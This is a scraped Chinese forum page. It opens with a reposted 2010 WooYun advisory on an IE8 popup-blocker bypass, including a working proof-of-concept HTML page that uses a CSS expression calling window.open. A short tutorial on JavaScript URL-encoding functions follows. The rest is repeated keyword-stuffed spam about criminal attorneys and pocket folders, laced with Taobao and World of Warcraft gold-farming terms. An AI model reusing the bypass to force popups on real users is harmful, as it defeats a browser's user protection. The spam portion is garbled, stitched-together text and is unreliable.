萧萧的论坛

详细说明：

微软IE8浏览器在处理CSS渲染的expression方法时对window.open的多次执行存在过滤错误, 导致窗口拦截功可被绕过. 攻击者只要在页面中的任意元素加上css poc:expression(window.open(somewhere)),就能让被攻击者在已被block的情况下点击页面任意位置触发弹出窗口.
漏洞证明：<html>

<head>

        <title>p.0.c for window block policy bypass</title>

</head>

<body>

        <!--

                This is a P.0.c for ByPass Microsoft Internet Explorer8(onlytest IE8) window block policy. have fun :)

                ======= www.wooyun.org =======

                ======= www.80sec.com  =======

                ======= www.kevin1986.com ====

        -->

        hello&nbsp;<span id="poc" style='display:none;poc:expression(window.open("http://www.80sec.com"))'>kEvin1986</span>

        <script>

                function opentest(){

                        var oname=window.open("http://www.kevin1986.com");

                        setTimeout('if(typeof(oname)=="undefined"){document.getElementById("poc").style.display=""}else{alert("window.open was allowe

d")}',1986)

                }

               

                opentest()

        </script>

</body>

</html>修复方案：

对多次触发window.open做特殊限制.(此建议会影响到部分功能的正常使用 orz)
缺陷编号： WooYun-2010-00177
漏洞标题： Microsoft IE8 window block policy ByPass
相关厂商： Microsoft
漏洞作者： kEvin1986
提交时间： 2010-08-09
公开时间： 2010-08-09
漏洞类型： 设计错误
危害等级： 中
漏洞状态： 未联系到厂商或者厂商积极忽略
漏洞来源： http://www.wooyun.org

js对文字进行编码涉及3个函数：escape,encodeURI,encodeURIComponent，相应3个解码函数：unescape,decodeURI,decodeURIComponent

1、   传递参数时需要使用encodeURIComponent，这样组合的url才不会被#等特殊字符截断。                           

例如：<script language="javascript">document.write(\'<a href="http://www.cpuele.com?aid=7&u=\'+encodeURIComponent(http://www.cpuele.com/index.htm)+\'">退出</a>\');</script>

 

2、   进行url跳转时可以整体使用encodeURI

例如：Location.href=encodeURI(http://www.cpuele.com/do/s?word=恒特电器&ct=21);

 

3、   js使用数据时可以使用escape

例如：搜藏中history纪录。

 

4、   escape对0-255以外的unicode值进行编码时输出%u****格式，其它情况下escape，encodeURI，encodeURIComponent编码结果相同。


注意：

最多使用的应为encodeURIComponent，它是将中文、韩文等特殊字符转换成utf-8格式的url编码，所以如果给后台传递参数需要使用encodeURIComponent时需要后台解码对utf-8支持（form中的编码方式和当前页面编码方式相同）

 

escape不编码字符有69个：*，+，-，.，/，@，_，0-9，a-z，A-Z

encodeURI不编码字符有82个：!，#，$，&，\'，(，)，*，+，,，-，.，/，:，;，=，?，@，_，~，0-9，a-z，A-Z

encodeURIComponent不编码字符有71个：!， \'，(，)，*，-，.，_，~，0-9，a-z，A-Z

 
联系qq 745998

请问楼主``pw 8.0的可以用吗？

Make sure the terms of the 重庆团购 engagement are clearly spelled out. Be sure to ask what the rates are for negotiating a plea agreement and any 淘宝网 other stages up to and including trial. Rates can vary dramatically from attorney to attorney and you can avoid a big 淘宝网女装 surprise by asking about them up front. An up front retainer fee after the initial consultation is usually 淘宝网 required. This fee may be many thousands of dollars depending upon the offense with which you are charged. Do speak about 淘宝商城 charges before hiring the attorney. Charges will vary from a lot between one criminal attorneys to another. Therefore, to 重庆二手交易 avoid any surprise one should speak to the attorneys about the charges priorly. Also, make sure to ask the 重庆二手电脑 criminal attorney that who will handle the case. Nowadays, busy attorneys make their assistants to carry 重庆二手手机 through all the process.

Make sure the terms of the 重庆团购 engagement are clearly spelled out. Be sure to ask what the rates are for negotiating a plea agreement and any 淘宝网 other stages up to and including trial. Rates can vary dramatically from attorney to attorney and you can avoid a big 淘宝网女装 surprise by asking about them up front. An up front retainer fee after the initial consultation is usually 淘宝网 required. This fee may be many thousands of dollars depending upon the offense with which you are charged. Do speak about 淘宝商城 charges before hiring the attorney. Charges will vary from a lot between one criminal attorneys to another. Therefore, to 重庆二手交易 avoid any surprise one should speak to the attorneys about the charges priorly. Also, make sure to ask the 重庆二手电脑 criminal attorney that who will handle the case. Nowadays, busy attorneys make their assistants to carry 重庆二手手机 through all the process.

Make sure the terms of the 重庆团购 engagement are clearly spelled out. Be sure to ask what the rates are for negotiating a plea agreement and any 淘宝网 other stages up to and including trial. Rates can vary dramatically from attorney to attorney and you can avoid a big 淘宝网女装 surprise by asking about them up front. An up front retainer fee after the initial consultation is usually 淘宝网 required. This fee may be many thousands of dollars depending upon the offense with which you are charged. Do speak about 淘宝商城 charges before hiring the attorney. Charges will vary from a lot between one criminal attorneys to another. Therefore, to 重庆二手交易 avoid any surprise one should speak to the attorneys about the charges priorly. Also, make sure to ask the 重庆二手电脑 criminal attorney that who will handle the case. Nowadays, busy attorneys make their assistants to carry 重庆二手手机 through all the process.

The two pocket folder wow power leveling is a very portable facility. You can easily carry your documents to any place without the risk wow power leveling of deforming them through creasing and so forth. Wherever you go, you can rest assured wow power leveling knowing that you have all the required documents well organized and in a world of warcraft power leveling safe place in the two pocket folder. www.pocketfolderstore.com is wow cheap gold an online store that offers a wide range of the two pocket folder. We realise that the two gold for wow pocket folder has been used for a long time in businesses that know the need for creativity when world of warcraft power leveling it comes to marketing and exclusive

The two pocket folder wow power leveling is a very portable facility. You can easily carry your documents to any place without the risk wow power leveling of deforming them through creasing and so forth. Wherever you go, you can rest assured wow power leveling knowing that you have all the required documents well organized and in a world of warcraft power leveling safe place in the two pocket folder. www.pocketfolderstore.com is wow cheap gold an online store that offers a wide range of the two pocket folder. We realise that the two gold for wow pocket folder has been used for a long time in businesses that know the need for creativity when world of warcraft power leveling it comes to marketing and exclusive

Personalized presentation wow power leveling folders are created for use by different companies for different purposes with product wow power leveling cataloguing being the basic use. Other uses in such companies could be in meetings wow power leveling where the custom presentation folders carry and circulate items such as world of warcraft gold agenda, quotations or any other details in the meeting room. Graphic designers and best wow gold artists may use personalized presentation folders to showcase their designs and works. Personalized cheapest wow gold presentation folders have found